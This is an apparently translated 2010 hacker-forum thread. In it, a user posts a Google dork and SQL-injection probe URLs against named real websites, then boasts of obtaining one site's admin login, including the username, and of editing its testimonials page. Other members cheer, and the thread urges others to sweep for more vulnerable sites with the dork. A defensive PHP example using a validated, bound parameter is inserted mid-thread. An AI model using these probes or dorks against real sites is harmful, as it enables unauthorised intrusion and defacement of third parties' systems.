[Bug] SQL injection in News Read ID (read.php?)

Post by poni » Sun May 30, 2010 10:06 pm

Component containing the SQL injection bug = read.php
DORK: inurl:"read.php?id="

POC
http://campus.sanook.com/inlove/read.php?id=132'
http://www.inspireyourworld.com/issue6/read.php?id=23'
http://www.wellerpools.com/news-read.php?id=16'
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
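
For the defender's side of the report above, an added example (not code from the thread or from any of the listed sites) of how a `read.php?id=` handler can refuse a value such as `16'` and query with a bound parameter. The `news` table, its columns and the function names are assumptions, and in-memory SQLite stands in for the site's database.

```php
<?php
// Added example, not code from the thread. The "news" table, its columns and
// the function names are assumptions; in-memory SQLite stands in for the real
// database. All rows and inputs are constructed.
//
// Assumed vulnerable pattern behind a read.php?id= page (do not use):
//   $sql = "SELECT title, body FROM news WHERE id = " . $_GET['id'];

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $pdo->exec("INSERT INTO news VALUES (16, 'Constructed <b>title</b>', 'Constructed body')");
    return $pdo;
}

// Returns [HTTP status, row or null]. $rawId is the untrusted ?id= value.
function read_news(PDO $pdo, $rawId): array
{
    // 1. Allow-list: the whole value must be a positive integer, so "16'"
    //    is refused before any SQL is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, null];
    }
    // 2. Bound parameter: the value travels separately from the SQL text.
    $stmt = $pdo->prepare('SELECT title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? [404, null] : [200, $row];
}

$pdo = open_demo_db();
foreach (['16', "16'", '9999', ''] as $input) {
    [$status, $row] = read_news($pdo, $input);
    // 3. Encode on output and never echo database errors to the client.
    $title = $row ? htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') : '-';
    printf("id=%s -> %d %s\n", var_export($input, true), $status, $title);
}
```

Run with the PHP CLI and the `pdo_sqlite` extension enabled; in a real handler the status would be sent with `http_response_code()` and errors logged server-side.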

Post by poni » Sun May 30, 2010 10:46 pm

http://www.wellerpools.com/news-read.php?id=16'

Got the Admin login + Pass :devil
Admin = chr1sty
Password : ************ censored

Post by shad.hckr » Sun May 30, 2010 10:51 pm

wow... so you're doing a sweep, are you, mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but that CMS is pretty cool too... :licik: :licik:
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Post by poni » Sun May 30, 2010 10:58 pm

there are gr33tz for you.. check it out
http://www.wellerpools.com/testimonials.php


Btw, all components can be modified, you could even upload a shell.. but I only went as far as editing testimonial.php. :P

Post by poni » Sun May 30, 2010 11:13 pm

shad.hckr wrote: wow... so you're doing a sweep, are you, mas pon... hehehehe... :ngakak: :ngakak: :ngakak:
but that CMS is pretty cool too... :licik: :licik:

yeah.. got nothing else to do, there are still lots of sites vulnerable with that content. just check the dork

Post by demonbrando » Sun May 30, 2010 11:29 pm

wow, bro poni, awesome... :devil but too bad the password is censored??? :putusasa:
live this life relaxed but don't forget to worship..
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Post by shad.hckr » Sun May 30, 2010 11:36 pm

wekekeke..

poni : Miss christy, we don`t do any harm on the system. Just put this message . so you may fix your web soon. thanks

Gr33tz:

   ^Family-Code^, ^rumput_kering^, 0x99/JerryMaheswara, Paman, XShadow, psychopath, fl3xu5, gblack, mas_agung, Jundi, ^_xfree_^, systemofadown, yadoy666, Phychole, Wilmar_Kidz, 3xtr3m3b0y, Darkzzzz, Shad.hckr,  And You... the marvellous XCoders those change the Indonesian Undergorund scenes

Http://forum.xcode.or.id


cool, mas.. =))

Xcode is no less than Agnes Monica, who went international.. :ngakak: :ngakak:

Post by anjay » Sun May 30, 2010 11:37 pm

awesome, om poni :love:
Above the sky there is still sky
Be like the rice plant: the fuller it gets, the lower it bows
anjay
 
Posts: 9
Joined: Sun Sep 16, 2007 3:13 pm

Post by shinichi81 » Mon May 31, 2010 10:16 am

please upload the POC, boss poni... :tapa: :tapa: :tapa: :tapa:
............make a wish............
shinichi81
 
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Post by peniru » Mon May 31, 2010 10:20 am

whoa.. more study material.... :love: :love:

thanks, kk poni..... :devil :devil
.::. My Sign .::.
..noobie Pool..
Using tools or not doesn't matter, what matters is being able to understand what is being done
peniru
 
Posts: 383
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
